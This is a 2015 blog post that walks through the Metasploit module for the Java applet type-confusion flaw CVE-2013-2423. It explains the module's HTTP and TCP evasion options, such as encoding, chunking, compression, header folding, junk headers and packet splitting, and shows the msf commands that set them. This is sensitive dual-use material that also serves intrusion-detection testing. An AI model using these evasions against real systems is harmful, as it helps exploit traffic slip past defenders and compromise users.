Friday, April 17, 2015

HTTP Evasions using Metasploit Framework

HTTP Evasions using metasploit module java_jre17_reflection_types. Below are the details of HTTP exploit which we will be using for our tests.
msf > info exploit/multi/browser/java_jre17_reflection_types
       Name: Java Applet Reflection Type Confusion Remote Code Execution
     Module: exploit/multi/browser/java_jre17_reflection_types
   Platform: Java, Linux, OSX, Windows
CVE: 2013-2423 (http://cvedetails.com/cve/2013-2423/)

Execute below commands to start using the exploit for launching attacks
msf > use exploit/multi/browser/java_jre17_reflection_types                                                          
msf exploit(java_jre17_reflection_types) >

Execute show options command to know what parameters need to be set before launching attack.
We need to set different options like destination IP/port, local IP/port and payload.

Following are different evasions which are supported by Metasploit.
msf exploit(java_jre17_reflection_types) > show evasion                                                              
Module evasion options:
   Name           : HTML::base64
   Current Setting: none
   Description    : Enable HTML obfuscation via an embeded base64 html object (IE 
      not supported) (accepted: none, plain, single_pad, double_pad, 
      random_space_injection)

   Name           : HTML::javascript::escape
   Current Setting: 0
   Description    : Enable HTML obfuscation via HTML escaping (number of iterations)

   Name           : HTML::unicode
   Current Setting: none
   Description    : Enable HTTP obfuscation via unicode (accepted: none, utf-16le, 
      utf-16be, utf-16be-marker, utf-32le, utf-32be)

   Name           : HTTP::chunked
   Current Setting: false
   Description    : Enable chunking of HTTP responses via "Transfer-Encoding: 
      chunked"

   Name           : HTTP::compression
   Current Setting: none
   Description    : Enable compression of HTTP responses via content encoding 
      (accepted: none, gzip, deflate)

   Name           : HTTP::header_folding
   Current Setting: false
   Description    : Enable folding of HTTP headers

   Name           : HTTP::junk_headers
   Current Setting: false
   Description    : Enable insertion of random junk HTTP headers

   Name           : HTTP::server_name
   Current Setting: Apache
   Description    : Configures the Server header of all outgoing replies

   Name           : TCP::max_send_size
   Current Setting: 0
   Description    : Maximum tcp segment size.  (0 = disable)

   Name           : TCP::send_delay
   Current Setting: 0
   Description    : Delays inserted before every send.  (0 = disable)
msf exploit(java_jre17_reflection_types) >

To select any evasion execute command similar to
msf exploit(java_jre17_reflection_types) > set evasion_name parameter
e.g.
msf exploit(java_jre17_reflection_types) > set HTTP::compression gzip


base64
Encode HTML page with base64, payload is not delivered in this case.
Base64 is binary-to-text encoding scheme that represent binary data in an ASCII string format by translating it into a radix-64 representation.


http://www.hcidata.info/base64.htm

javascript escape (iteration 1)
Insert unescape function into HTML page.
escape() function is used to encode string for portability reasons so it can be transmitted across networks and computers. unescape() function decodes an encoded string.

String Encoding: document.write(escape("Escape Function!"));
Output of Above Code: Escape%20Function%21

String Encoding: document.write(unescape("Escape%u20Function%u21"));
Output of Above Code: Escape Function!



unicode (utf16-be)
Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language.

For more info on Unicode
http://unicode.org/standard/WhatIsUnicode.html

chunked
Instead of "Content-Length" header, HTTP response will have "Transfer-Encoding" and data is sent in chunks whose size is mentioned at the start of the HTTP response data.



compression (gzip)
The process of reducing data size is known as “data compression”. GZIP performs best on text-based data say, CSS, JavaScript, HTML, most of the browsers support GZIP compression. For GZIP compression intricacies, refer this Youtube link.



Header Folding
Insert characters like space(\x20), horizontal tab(\x09) etc. between headers.
From RFC 2616,
        HTTP/1.1 header field values can be folded onto multiple lines if the continuation
        line begins with a space or horizontal tab. All linear white space, including folding,
        has the same semantics as SP. A recipient MAY replace any linear white space
        with a single SP before interpreting the field value or forwarding the message
        downstream.


Junk Headers
Insert invalid headers into the HTTP response.



TCP max_send_size
Metasploit doesn't send packets with segment size of  8 bytes when max_send_size is set to 8. In the normal attack scenario we were sending 30 to 40 packets but in this evasion type we send 80 packets.

TCP send_delay
TCP Delay, not sure the value passed is micro seconds or seconds, we doesn't see any delay between packets.